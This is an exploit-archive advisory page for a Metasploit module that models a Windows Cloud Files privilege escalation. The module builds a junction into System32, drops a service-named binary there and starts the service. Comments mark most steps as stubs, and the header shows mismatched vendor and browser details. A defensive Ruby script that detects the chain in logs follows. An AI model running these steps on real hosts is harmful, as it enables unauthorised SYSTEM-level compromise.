Description
This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. The workflow simulates abusing file system operations and cloud sync mechanisms by...
Basic Information
ID
PACKETSTORM:219878
Published
Apr 27, 2026 at 00:00
==================================================================================================================================
| # Title : Windows Cloud Files Tiering Engine Local Privilege Escalation Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.sqlite.org |
==================================================================================================================================
[+] Summary : This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction.
The workflow simulates abusing file system operations and cloud sync mechanisms by creating controlled directories, placeholder files, and junction points to influence system-level service behavior.
[+] POC :
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::File
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Registry

  def initialize(info = {})
    # No module metadata (Name, Description, Platform, Targets) is supplied;
    # update_info is called with an empty merge, exactly as posted.
    super(update_info(info, info.merge({})))

    # WORK_DIR and TIMEOUT are read from the datastore below but the posted
    # module never registers them (datastore['TIMEOUT'] would be nil and
    # nil.times raises). The option names come from the module; the defaults
    # are assumed here.
    register_options([
      OptString.new('WORK_DIR', [true, 'Base directory for the working directory', '%TEMP%']),
      OptInt.new('TIMEOUT', [true, 'Seconds to wait for the event', 10])
    ])
  end

  # Only confirms a Windows session with WINDIR set; nothing about the
  # Cloud Files / tiering components themselves is checked.
  def check
    print_status("Checking Cloud Files + OS compatibility...")
    unless session.platform =~ /windows/i
      return Exploit::CheckCode::Safe("Not Windows")
    end
    if session.sys.config.getenv('WINDIR')
      return Exploit::CheckCode::Appears("Windows environment detected")
    end
    Exploit::CheckCode::Unknown
  end

  # Orchestrates the modelled flow. Several steps below are stubs that only
  # echo a string or sleep, so the module describes the sequence rather than
  # performing it.
  def exploit
    print_status("Starting Cloud Files Shadow Copy exploit")
    work_dir = setup_working_directory
    fail_with(Failure::BadConfig, "Failed to create working directory") unless work_dir
    pipe_handle = create_named_pipe
    fail_with(Failure::UnexpectedReply, "Failed to create named pipe") unless pipe_handle
    create_malicious_file(work_dir)
    wait_for_event(datastore['TIMEOUT'])
    set_file_disposition(pipe_handle)
    close_handle(pipe_handle)
    register_cloud_sync_root(work_dir)
    create_placeholder_file(work_dir)
    wait_for_oplock
    rename_and_delete_file(work_dir)
    create_reparse_point(work_dir)
    copy_to_system32
    launch_tiering_engine
    cleanup(work_dir)
    print_good("Exploit completed!")
  end

  private

  # Creates <WORK_DIR>\RS-<8 random chars>; returns the path or nil on error.
  def setup_working_directory
    base = expand_path(datastore['WORK_DIR'])
    path = "#{base}\\RS-#{Rex::Text.rand_text_alphanumeric(8)}"
    begin
      session.fs.dir.mkdir(path)
      return path
    rescue
      return nil
    end
  end

  # Creates \\.\pipe\REDSUN via railgun (PIPE_ACCESS_DUPLEX, one instance,
  # 4 KiB buffers); returns the raw handle value or nil on error.
  def create_named_pipe
    pipe_name = "\\\\.\\pipe\\REDSUN"
    begin
      session.railgun.kernel32.CreateNamedPipeW(
        pipe_name,
        3, 0, 1, 4096, 4096, 0, nil
      )['return']
    rescue
      nil
    end
  end

  # Writes a placeholder string, not an executable, under the service binary name.
  def create_malicious_file(work_dir)
    file_path = "#{work_dir}\\TieringEngineService.exe"
    payload = "DUMMY_PAYLOAD"
    begin
      session.fs.file.write(file_path, payload)
      file_path
    rescue
      nil
    end
  end

  # Polls check_event_signaled once per second for up to timeout_sec seconds.
  def wait_for_event(timeout_sec)
    timeout_sec.times do
      break if check_event_signaled
      Rex.sleep(1)
    end
  end

  # Always false, so wait_for_event simply sleeps for the full timeout.
  def check_event_signaled
    false
  end

  # Stub: no FILE_DISPOSITION_INFO call is made; returns whether a handle exists.
  def set_file_disposition(handle)
    return false unless handle
    true
  end

  # Stub: only echoes a string; no sync root is registered.
  def register_cloud_sync_root(work_dir)
    cmd = "powershell -Command \"Write-Output 'CloudSyncRegistered'\""
    session.shell_command_token(cmd)
  end

  # Stub: only echoes a string; no placeholder file is created.
  def create_placeholder_file(work_dir)
    cmd = "powershell -Command \"Write-Output 'PlaceholderCreated'\""
    session.shell_command_token(cmd)
  end

  # Stub: fixed delay; no oplock is requested or awaited.
  def wait_for_oplock
    Rex.sleep(2)
  end

  # Renames the whole working directory to <work_dir>.tmp. Later steps still
  # use the original work_dir path, so the junction below is created under a
  # path that no longer exists. Errors are swallowed.
  def rename_and_delete_file(work_dir)
    temp = "#{work_dir}.tmp"
    begin
      session.fs.dir.move(work_dir, temp)
    rescue
    end
  end

  # Creates an NTFS junction <work_dir>\link pointing at System32.
  def create_reparse_point(work_dir)
    target = "C:\\Windows\\System32"
    session.shell_command_token("mklink /J \"#{work_dir}\\link\" \"#{target}\"")
  end

  # Copies the current process image into System32 under the service binary
  # name; this only succeeds if the session can already write to System32.
  def copy_to_system32
    begin
      exe = session.sys.process.current_path rescue nil
      return unless exe
      dest = "#{expand_path('%WINDIR%')}\\System32\\TieringEngineService.exe"
      session.fs.file.copy(exe, dest)
    rescue
    end
  end

  # Starts the service via sc; errors are swallowed.
  def launch_tiering_engine
    session.shell_command_token("sc start TieringEngineService")
  rescue
  end

  def cleanup(work_dir)
    session.shell_command_token("rmdir /s /q \"#{work_dir}\"")
  rescue
  end

  def close_handle(handle)
    session.railgun.kernel32.CloseHandle(handle) if handle && handle != 0
  end

  # Expands only %TEMP% and %WINDIR% using the session's environment.
  def expand_path(path)
    path.gsub('%TEMP%', session.sys.config.getenv('TEMP').to_s)
        .gsub('%WINDIR%', session.sys.config.getenv('WINDIR').to_s)
  end

  # Unused in the flow above; matches on the user name string only.
  def is_admin?
    session.sys.config.getuid =~ /SYSTEM|Administrator/
  end
end
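The module above models a three-step chain on the host: a junction created from a user-writable directory into System32, a binary written into System32 under a service's name, and that service started afterwards. The following Ruby script is an added example, not part of the advisory or of indoushka's module, showing how a defender could flag that chain in host telemetry. The "time|user|event|detail" line format and the sample events are constructed for the example; the rule logic (junction target under System32, non-SYSTEM account creating an .exe in System32, "sc start" of a service whose binary the same account just dropped) is what a real detection would carry over to Sysmon or EDR events.

```ruby
# Added example (not part of the advisory or the module above).
# Detection pass over constructed host events that flags the sequence the
# module models: a junction into System32, a service-named .exe written into
# System32 by a non-SYSTEM account, and that service started afterwards by the
# same account. The "time|user|event|detail" format is made up for this example.

Event = Struct.new(:time, :user, :kind, :detail)

# Matches the path component sequence \Windows\System32 (followed by \ or end).
SYSTEM32 = /\\windows\\system32(\\|\z)/i

# Constructed sample events; only the first three form the suspicious chain.
SAMPLE_LOG = <<~LOG
  2026-04-27T10:00:01|DESKTOP\\alice|ProcessCreate|cmd.exe /c mklink /J "C:\\Users\\alice\\AppData\\Local\\Temp\\RS-ab12cd34\\link" "C:\\Windows\\System32"
  2026-04-27T10:00:03|DESKTOP\\alice|FileCreate|C:\\Windows\\System32\\TieringEngineService.exe
  2026-04-27T10:00:04|DESKTOP\\alice|ProcessCreate|sc start TieringEngineService
  2026-04-27T10:05:00|NT AUTHORITY\\SYSTEM|FileCreate|C:\\Windows\\System32\\LogFiles\\WMI\\trace.etl
  2026-04-27T10:06:00|DESKTOP\\bob|ProcessCreate|cmd.exe /c mklink /J "C:\\Users\\bob\\proj\\link" "C:\\Users\\bob\\data"
LOG

def parse_log(text)
  text.each_line.map do |line|
    time, user, kind, detail = line.chomp.split('|', 4)
    Event.new(time, user, kind, detail)
  end
end

# Rule 1: "mklink /J <link> <target>" whose target lies under System32.
def junction_into_system32?(ev)
  return false unless ev.kind == 'ProcessCreate'
  m = ev.detail.match(/mklink\s+\/J\s+"([^"]+)"\s+"([^"]+)"/i)
  !!(m && m[2] =~ SYSTEM32)
end

# Rule 2: an .exe created directly in System32 by an account other than SYSTEM.
def exe_dropped_in_system32?(ev)
  ev.kind == 'FileCreate' &&
    ev.user != 'NT AUTHORITY\\SYSTEM' &&
    !!(ev.detail =~ /\\windows\\system32\\[^\\]+\.exe\z/i)
end

# Rule 3 correlates: "sc start <svc>" by an account that earlier dropped
# <svc>.exe into System32 (rule 2). Returns one finding string per hit,
# in event order.
def correlate(events)
  findings = []
  dropped = Hash.new { |h, k| h[k] = [] } # user => service names dropped
  events.each do |ev|
    if junction_into_system32?(ev)
      findings << "#{ev.time} #{ev.user}: junction into System32: #{ev.detail}"
    end
    if exe_dropped_in_system32?(ev)
      svc = File.basename(ev.detail.tr('\\', '/'), '.exe')
      dropped[ev.user] << svc.downcase
      findings << "#{ev.time} #{ev.user}: wrote #{svc}.exe into System32"
    end
    next unless ev.kind == 'ProcessCreate'
    m = ev.detail.match(/\Asc\s+start\s+(\S+)/i)
    if m && dropped[ev.user].include?(m[1].downcase)
      findings << "#{ev.time} #{ev.user}: started service #{m[1]} after dropping its binary"
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  correlate(parse_log(SAMPLE_LOG)).each { |f| puts f }
end
```

On the sample input the script reports three findings, all for the same account: the junction into System32, the write of TieringEngineService.exe into System32, and the subsequent "sc start" of that service. Bob's junction between two user directories and SYSTEM's own file creation under System32 are not flagged, which is the point of keying rule 2 on the account and rule 3 on the earlier drop rather than on "sc start" alone.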
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================